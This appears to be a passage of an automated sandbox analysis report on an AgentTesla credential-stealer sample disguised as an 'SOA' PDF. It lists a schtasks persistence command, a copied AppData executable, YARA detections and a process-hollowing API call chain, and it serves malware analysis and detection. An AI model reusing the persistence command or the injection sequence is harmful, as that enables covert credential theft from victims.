                                Reputation:low
                                Has exited:true

                                General

                                Target ID:17
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:18
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:19
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0x320000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:20
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xeb0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:21
                                Start time:09:02:16
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0x4b0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:22
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:23
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:24
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xde0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:260
                                  Total number of Limit Nodes:12
                                  execution_graph 39586 e1d6e0 39587 e1d6ed 39586->39587 39588 e1d727 39587->39588 39590 e1d018 39587->39590 39592 e1d023 39590->39592 39591 e1e038 39592->39591 39594 e1d144 39592->39594 39595 e1d14f 39594->39595 39598 e17410 39595->39598 39597 e1e0a7 39597->39591 39599 e1741b 39598->39599 39600 e18d93 39599->39600 39602 e1b440 39599->39602 39600->39597 39603 e1b450 39602->39603 39607 e1b468 39603->39607 39611 e1b478 39603->39611 39604 e1b456 39604->39600 39608 e1b478 39607->39608 39614 e1b55f 39608->39614 39609 e1b487 39609->39604 39613 e1b55f 2 API calls 39611->39613 39612 e1b487 39612->39604 39613->39612 39615 e1b570 39614->39615 39616 e1b5a4 39615->39616 39622 e1b7f8 39615->39622 39626 e1b808 39615->39626 39616->39609 39617 e1b59c 39617->39616 39618 e1b7a8 GetModuleHandleW 39617->39618 39619 e1b7d5 39618->39619 39619->39609 39623 e1b808 39622->39623 39625 e1b841 39623->39625 39630 e1afb0 39623->39630 39625->39617 39628 e1b81c 39626->39628 39627 e1b841 39627->39617 39628->39627 39629 e1afb0 LoadLibraryExW 39628->39629 39629->39627 39631 e1b9e8 LoadLibraryExW 39630->39631 39633 e1ba61 39631->39633 39633->39625 39900 e1da40 DuplicateHandle 39901 e1dad6 39900->39901 39906 d3b1588 39907 d3b1713 39906->39907 39908 d3b15ae 39906->39908 39908->39907 39911 d3b1808 PostMessageW 39908->39911 39913 d3b1800 39908->39913 39912 d3b1874 39911->39912 39912->39908 39914 d3b1809 PostMessageW 39913->39914 39915 d3b1874 39914->39915 39915->39908 39902 4f421d0 39903 4f42238 CreateWindowExW 39902->39903 39905 4f422f4 39903->39905 39905->39905 39752 70cd6da 39757 d3b0320 39752->39757 39770 d3b0386 39752->39770 39784 d3b0310 39752->39784 39753 70cd6ee 39758 d3b033a 39757->39758 39765 d3b0342 39758->39765 39797 d3b0a48 39758->39797 39802 d3b0b3b 39758->39802 39807 d3b0875 39758->39807 39812 d3b0766 39758->39812 39817 d3b0937 39758->39817 39822 d3b07e0 39758->39822 39829 d3b0892 39758->39829 39833 d3b0e43 39758->39833 39838 d3b0803 39758->39838 39845 d3b079d 39758->39845 39765->39753 39771 d3b0314 39770->39771 39773 d3b0389 39770->39773 39772 d3b0342 39771->39772 39774 d3b0b3b 2 API calls 39771->39774 39775 d3b0a48 2 API calls 39771->39775 39776 d3b079d 2 API calls 39771->39776 39777 d3b0803 4 API calls 39771->39777 39778 d3b0e43 2 API calls 39771->39778 39779 d3b0892 2 API calls 39771->39779 39780 d3b07e0 4 API calls 39771->39780 39781 d3b0937 2 API calls 39771->39781 39782 d3b0766 2 API calls 39771->39782 39783 d3b0875 2 API calls 39771->39783 39772->39753 39773->39753 39774->39772 39775->39772 39776->39772 39777->39772 39778->39772 39779->39772 39780->39772 39781->39772 39782->39772 39783->39772 39785 d3b0321 39784->39785 39786 d3b0b3b 2 API calls 39785->39786 39787 d3b0a48 2 API calls 39785->39787 39788 d3b079d 2 API calls 39785->39788 39789 d3b0803 4 API calls 39785->39789 39790 d3b0e43 2 API calls 39785->39790 39791 d3b0892 2 API calls 39785->39791 39792 d3b0342 39785->39792 39793 d3b07e0 4 API calls 39785->39793 39794 d3b0937 2 API calls 39785->39794 39795 d3b0766 2 API calls 39785->39795 39796 d3b0875 2 API calls 39785->39796 39786->39792 39787->39792 39788->39792 39789->39792 39790->39792 39791->39792 39792->39753 39793->39792 39794->39792 39795->39792 39796->39792 39798 d3b0a6b 39797->39798 39850 70cd028 39798->39850 39854 70cd020 39798->39854 39799 d3b0ac2 39799->39765 39803 d3b0b41 39802->39803 39858 70cd118 39803->39858 39862 70cd112 39803->39862 39804 d3b0b64 39804->39765 39808 d3b0f80 39807->39808 39866 70ccf68 39808->39866 39870 70ccf60 39808->39870 39809 d3b0ee1 39809->39765 39813 d3b0772 39812->39813 39874 70cce88 39813->39874 39878 70cce90 39813->39878 39814 d3b0700 39814->39765 39818 d3b093d 39817->39818 39820 70cd028 WriteProcessMemory 39818->39820 39821 70cd020 WriteProcessMemory 39818->39821 39819 d3b09bc 39819->39765 39820->39819 39821->39819 39823 d3b07f1 39822->39823 39824 d3b07ab 39822->39824 39825 70cce88 Wow64SetThreadContext 39823->39825 39826 70cce90 Wow64SetThreadContext 39823->39826 39882 70ccdd8 39824->39882 39886 70ccde0 39824->39886 39825->39824 39826->39824 39830 d3b08aa 39829->39830 39831 70ccdd8 ResumeThread 39830->39831 39832 70ccde0 ResumeThread 39830->39832 39831->39830 39832->39830 39834 d3b0772 39833->39834 39834->39833 39836 70cce88 Wow64SetThreadContext 39834->39836 39837 70cce90 Wow64SetThreadContext 39834->39837 39835 d3b0700 39835->39765 39836->39835 39837->39835 39839 d3b0807 39838->39839 39841 70cce88 Wow64SetThreadContext 39839->39841 39842 70cce90 Wow64SetThreadContext 39839->39842 39840 d3b07ab 39843 70ccdd8 ResumeThread 39840->39843 39844 70ccde0 ResumeThread 39840->39844 39841->39840 39842->39840 39843->39840 39844->39840 39847 d3b0854 39845->39847 39846 d3b0e26 39847->39846 39848 70cd028 WriteProcessMemory 39847->39848 39849 70cd020 WriteProcessMemory 39847->39849 39848->39847 39849->39847 39851 70cd070 WriteProcessMemory 39850->39851 39853 70cd0c7 39851->39853 39853->39799 39855 70cd029 WriteProcessMemory 39854->39855 39857 70cd0c7 39855->39857 39857->39799 39859 70cd163 ReadProcessMemory 39858->39859 39861 70cd1a7 39859->39861 39861->39804 39863 70cd119 ReadProcessMemory 39862->39863 39865 70cd1a7 39863->39865 39865->39804 39867 70ccfa8 VirtualAllocEx 39866->39867 39869 70ccfe5 39867->39869 39869->39809 39871 70ccf69 VirtualAllocEx 39870->39871 39873 70ccfe5 39871->39873 39873->39809 39875 70cce91 Wow64SetThreadContext 39874->39875 39877 70ccf1d 39875->39877 39877->39814 39879 70cced5 Wow64SetThreadContext 39878->39879 39881 70ccf1d 39879->39881 39881->39814 39883 70ccde1 ResumeThread 39882->39883 39885 70cce51 39883->39885 39885->39824 39887 70cce20 ResumeThread 39886->39887 39889 70cce51 39887->39889 39889->39824 39634 dbd01c 39635 dbd034 39634->39635 39636 dbd08e 39635->39636 39641 4f42377 39635->39641 39645 4f42388 39635->39645 39649 4f430e8 39635->39649 39658 4f40fac 39635->39658 39642 4f423ae 39641->39642 39643 4f40fac CallWindowProcW 39642->39643 39644 4f423cf 39643->39644 39644->39636 39648 4f423ae 39645->39648 39646 4f40fac CallWindowProcW 39647 4f423cf 39646->39647 39647->39636 39648->39646 39650 4f430f8 39649->39650 39651 4f43159 39650->39651 39653 4f43149 39650->39653 39683 4f410d4 39651->39683 39667 4f43280 39653->39667 39672 4f4334c 39653->39672 39678 4f43270 39653->39678 39654 4f43157 39659 4f40fb7 39658->39659 39660 4f43159 39659->39660 39662 4f43149 39659->39662 39661 4f410d4 CallWindowProcW 39660->39661 39663 4f43157 39661->39663 39664 4f43280 CallWindowProcW 39662->39664 39665 4f43270 CallWindowProcW 39662->39665 39666 4f4334c CallWindowProcW 39662->39666 39663->39663 39664->39663 39665->39663 39666->39663 39668 4f43294 39667->39668 39687 4f43338 39668->39687 39690 4f43329 39668->39690 39669 4f43320 39669->39654 39673 4f4330a 39672->39673 39674 4f4335a 39672->39674 39676 4f43338 CallWindowProcW 39673->39676 39677 4f43329 CallWindowProcW 39673->39677 39675 4f43320 39675->39654 39676->39675 39677->39675 39680 4f43294 39678->39680 39679 4f43320 39679->39654 39681 4f43338 CallWindowProcW 39680->39681 39682 4f43329 CallWindowProcW 39680->39682 39681->39679 39682->39679 39684 4f410df 39683->39684 39685 4f4483a CallWindowProcW 39684->39685 39686 4f447e9 39684->39686 39685->39686 39686->39654 39688 4f43349 39687->39688 39693 4f44780 39687->39693 39688->39669 39691 4f44780 CallWindowProcW 39690->39691 39692 4f43349 39690->39692 39691->39692 39692->39669 39694 4f410d4 CallWindowProcW 39693->39694 39695 4f4478a 39694->39695 39695->39688 39696 e14668 39697 e1467a 39696->39697 39698 e14686 39697->39698 39702 e14778 39697->39702 39707 e14204 39698->39707 39700 e146a5 39703 e1479d 39702->39703 39711 e14879 39703->39711 39715 e14888 39703->39715 39708 e1420f 39707->39708 39723 e15e78 39708->39723 39710 e177cc 39710->39700 39712 e14888 39711->39712 39713 e1498c 39712->39713 39719 e144e4 39712->39719 39713->39713 39717 e148af 39715->39717 39716 e1498c 39716->39716 39717->39716 39718 e144e4 CreateActCtxA 39717->39718 39718->39716 39720 e15918 CreateActCtxA 39719->39720 39722 e159db 39720->39722 39724 e15e83 39723->39724 39727 e173b0 39724->39727 39726 e1794d 39726->39710 39728 e173bb 39727->39728 39731 e173e0 39728->39731 39730 e17a22 39730->39726 39732 e173eb 39731->39732 39733 e17410 2 API calls 39732->39733 39734 e17b25 39733->39734 39734->39730 39890 e1d7f8 39891 e1d83e GetCurrentProcess 39890->39891 39893 e1d890 GetCurrentThread 39891->39893 39894 e1d889 39891->39894 39895 e1d8c6 39893->39895 39896 e1d8cd GetCurrentProcess 39893->39896 39894->39893 39895->39896 39897 e1d903 GetCurrentThreadId 39896->39897 39899 e1d95c 39897->39899 39735 4f47838 39736 4f47866 39735->39736 39739 4f47540 39736->39739 39738 4f478d5 39740 4f4754b 39739->39740 39742 4f496c5 39740->39742 39743 4f476e0 39740->39743 39742->39738 39744 4f476eb 39743->39744 39746 e173e0 2 API calls 39744->39746 39748 e17a70 39744->39748 39745 4f49c64 39745->39742 39746->39745 39749 e17ab3 39748->39749 39750 e17410 2 API calls 39749->39750 39751 e17b25 39750->39751 39751->39745 39916 70cd2b0 39917 70cd339 CreateProcessA 39916->39917 39919 70cd4fb 39917->39919

                                  Executed Functions

                                  Function 0D3B1D78 Relevance: .3, Instructions: 345COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e007c5a32e438aaf9caaa6e9a24bbaa79ce6a2b1ade1c1e5bf1761b1bb1aa1bc
                                  • Instruction ID: 3e27c8df7ce75e54155fa48e45443c53fc044589ef1b57c5fe0d2c0ac79c2244
                                  • Opcode Fuzzy Hash: e007c5a32e438aaf9caaa6e9a24bbaa79ce6a2b1ade1c1e5bf1761b1bb1aa1bc
                                  • Instruction Fuzzy Hash: A2C1DB717017008FDB26DB75C461BBEB7FAAF89300F14856EE24A9B691DB34D902C752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F40FD4 Relevance: .3, Instructions: 253COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01fbfede9f7d7432db922c758eb64bf507ef55403291bce5102dc9c8141b824c
                                  • Instruction ID: 2f1e8a668e66007edc4d6ca94d77e0408980941a067cb136d5767fd9be135505
                                  • Opcode Fuzzy Hash: 01fbfede9f7d7432db922c758eb64bf507ef55403291bce5102dc9c8141b824c
                                  • Instruction Fuzzy Hash: 69A19135E003198FCB04DFA4D8949EDBBBAFF89350F158665F415AB2A4DF30A986CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F424DA Relevance: .2, Instructions: 215COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd4ce4edf1e3ad604e2fa601bc9f353fd4d7615d03446c093ecdfa7d1e6be3e
                                  • Instruction ID: 8b709b35aacbb5667a83719a2bfd611af03e4be45a405c7790b1272a51f16713
                                  • Opcode Fuzzy Hash: 8cd4ce4edf1e3ad604e2fa601bc9f353fd4d7615d03446c093ecdfa7d1e6be3e
                                  • Instruction Fuzzy Hash: E6918E35E0031A8FCB04DFA4D9948DDBBBAFF89310F158665F415AB2A4EF30A985CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C089F Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3553adff2a16798d86d39f6142bec2aeb261d24a886e83f9708cd338ec2b99d3
                                  • Instruction ID: 8c0a8605a40f4df207ba15bf8d9a5edc5f10d344bb3f022db9a9689f4dfa4562
                                  • Opcode Fuzzy Hash: 3553adff2a16798d86d39f6142bec2aeb261d24a886e83f9708cd338ec2b99d3
                                  • Instruction Fuzzy Hash: 255148B0E1520ADFDB04CFA6D8456AEBBF2FF89310F24952AD415A7354E7345A42CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C08B0 Relevance: .1, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d16b0e392b3310c1e8363681b6eed9c7f06e4eaca6b3aac77ffb0f19bcdec05
                                  • Instruction ID: 325aae5dbc7bbc217732046e4dc9cccb89bdda08e6c1a7bdec144cf72e4e5973
                                  • Opcode Fuzzy Hash: 8d16b0e392b3310c1e8363681b6eed9c7f06e4eaca6b3aac77ffb0f19bcdec05
                                  • Instruction Fuzzy Hash: B05137B0E1520ADFDB08CFAAD8456AEBBF2EF89310F14952AD416A7254E7345A41CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C7538 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6e75afbaa63d72f63e7592f4849f790426e59b9216013a2bef9b0b5e91e1438
                                  • Instruction ID: 3c1e5fd082084547ed13510c01e4016f8ca98a6c2d42a05da87a9bd533a42ac8
                                  • Opcode Fuzzy Hash: b6e75afbaa63d72f63e7592f4849f790426e59b9216013a2bef9b0b5e91e1438
                                  • Instruction Fuzzy Hash: 192126B0D056588BEB18CFAAC9183DEBFF3AFC9300F14D16AD409B6264DB7409468F90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D3B0CC4 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e15a285cfe708091f98d6889ee862305932dc1f65cb491479512a9decb81328c
                                  • Instruction ID: efe3258432515cb5423c3f2d893dd2db7323518fe7e7d99160b1ab00876f2cec
                                  • Opcode Fuzzy Hash: e15a285cfe708091f98d6889ee862305932dc1f65cb491479512a9decb81328c
                                  • Instruction Fuzzy Hash: 61D05E19A5E3858BCA020A5468700F5FB3CB6470B2F0932A2879E97C939604801A8316
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1D7F8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 e1d7f8-e1d887 GetCurrentProcess 301 e1d890-e1d8c4 GetCurrentThread 297->301 302 e1d889-e1d88f 297->302 303 e1d8c6-e1d8cc 301->303 304 e1d8cd-e1d901 GetCurrentProcess 301->304 302->301 303->304 306 e1d903-e1d909 304->306 307 e1d90a-e1d922 304->307 306->307 309 e1d92b-e1d95a GetCurrentThreadId 307->309 311 e1d963-e1d9c5 309->311 312 e1d95c-e1d962 309->312 312->311
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D876
                                  • GetCurrentThread.KERNEL32 ref: 00E1D8B3
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 00E1D949
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 03b491f416c4f39b7a7ea9713596524d205d2a79879fb6ee8808fdf7b466dda9
                                  • Instruction ID: 7947f88a9e1b423b01cdf83796fc1860ed1a5471bbf7c050a95b556825d027ed
                                  • Opcode Fuzzy Hash: 03b491f416c4f39b7a7ea9713596524d205d2a79879fb6ee8808fdf7b466dda9
                                  • Instruction Fuzzy Hash: 7B5137B09007498FDB14DFA9D948BDEBBF5EF88314F208459E019A73A0D7789984CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD2A4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 948 70cd2a4-70cd345 950 70cd37e-70cd39e 948->950 951 70cd347-70cd351 948->951 956 70cd3d7-70cd406 950->956 957 70cd3a0-70cd3aa 950->957 951->950 952 70cd353-70cd355 951->952 954 70cd378-70cd37b 952->954 955 70cd357-70cd361 952->955 954->950 958 70cd365-70cd374 955->958 959 70cd363 955->959 967 70cd43f-70cd4f9 CreateProcessA 956->967 968 70cd408-70cd412 956->968 957->956 960 70cd3ac-70cd3ae 957->960 958->958 961 70cd376 958->961 959->958 962 70cd3b0-70cd3ba 960->962 963 70cd3d1-70cd3d4 960->963 961->954 965 70cd3bc 962->965 966 70cd3be-70cd3cd 962->966 963->956 965->966 966->966 969 70cd3cf 966->969 979 70cd4fb-70cd501 967->979 980 70cd502-70cd588 967->980 968->967 970 70cd414-70cd416 968->970 969->963 972 70cd418-70cd422 970->972 973 70cd439-70cd43c 970->973 974 70cd424 972->974 975 70cd426-70cd435 972->975 973->967 974->975 975->975 976 70cd437 975->976 976->973 979->980 990 70cd598-70cd59c 980->990 991 70cd58a-70cd58e 980->991 993 70cd5ac-70cd5b0 990->993 994 70cd59e-70cd5a2 990->994 991->990 992 70cd590 991->992 992->990 995 70cd5c0-70cd5c4 993->995 996 70cd5b2-70cd5b6 993->996 994->993 997 70cd5a4 994->997 999 70cd5d6-70cd5dd 995->999 1000 70cd5c6-70cd5cc 995->1000 996->995 998 70cd5b8 996->998 997->993 998->995 1001 70cd5df-70cd5ee 999->1001 1002 70cd5f4 999->1002 1000->999 1001->1002 1004 70cd5f5 1002->1004 1004->1004
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070CD4E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c0dca4269b29425ed3e4ccc8a2aeeec7174e9741b37902be259b85913d1508cd
                                  • Instruction ID: 46d281617325de522ac138cd2ff3df2a1499754b0650c0c5ff490a56b36cc333
                                  • Opcode Fuzzy Hash: c0dca4269b29425ed3e4ccc8a2aeeec7174e9741b37902be259b85913d1508cd
                                  • Instruction Fuzzy Hash: 8CA15EB1E0021ADFDB14DF68C9417EDBBF2BF48314F1482A9E819A7290DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD2B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1005 70cd2b0-70cd345 1007 70cd37e-70cd39e 1005->1007 1008 70cd347-70cd351 1005->1008 1013 70cd3d7-70cd406 1007->1013 1014 70cd3a0-70cd3aa 1007->1014 1008->1007 1009 70cd353-70cd355 1008->1009 1011 70cd378-70cd37b 1009->1011 1012 70cd357-70cd361 1009->1012 1011->1007 1015 70cd365-70cd374 1012->1015 1016 70cd363 1012->1016 1024 70cd43f-70cd4f9 CreateProcessA 1013->1024 1025 70cd408-70cd412 1013->1025 1014->1013 1017 70cd3ac-70cd3ae 1014->1017 1015->1015 1018 70cd376 1015->1018 1016->1015 1019 70cd3b0-70cd3ba 1017->1019 1020 70cd3d1-70cd3d4 1017->1020 1018->1011 1022 70cd3bc 1019->1022 1023 70cd3be-70cd3cd 1019->1023 1020->1013 1022->1023 1023->1023 1026 70cd3cf 1023->1026 1036 70cd4fb-70cd501 1024->1036 1037 70cd502-70cd588 1024->1037 1025->1024 1027 70cd414-70cd416 1025->1027 1026->1020 1029 70cd418-70cd422 1027->1029 1030 70cd439-70cd43c 1027->1030 1031 70cd424 1029->1031 1032 70cd426-70cd435 1029->1032 1030->1024 1031->1032 1032->1032 1033 70cd437 1032->1033 1033->1030 1036->1037 1047 70cd598-70cd59c 1037->1047 1048 70cd58a-70cd58e 1037->1048 1050 70cd5ac-70cd5b0 1047->1050 1051 70cd59e-70cd5a2 1047->1051 1048->1047 1049 70cd590 1048->1049 1049->1047 1052 70cd5c0-70cd5c4 1050->1052 1053 70cd5b2-70cd5b6 1050->1053 1051->1050 1054 70cd5a4 1051->1054 1056 70cd5d6-70cd5dd 1052->1056 1057 70cd5c6-70cd5cc 1052->1057 1053->1052 1055 70cd5b8 1053->1055 1054->1050 1055->1052 1058 70cd5df-70cd5ee 1056->1058 1059 70cd5f4 1056->1059 1057->1056 1058->1059 1061 70cd5f5 1059->1061 1061->1061
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070CD4E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
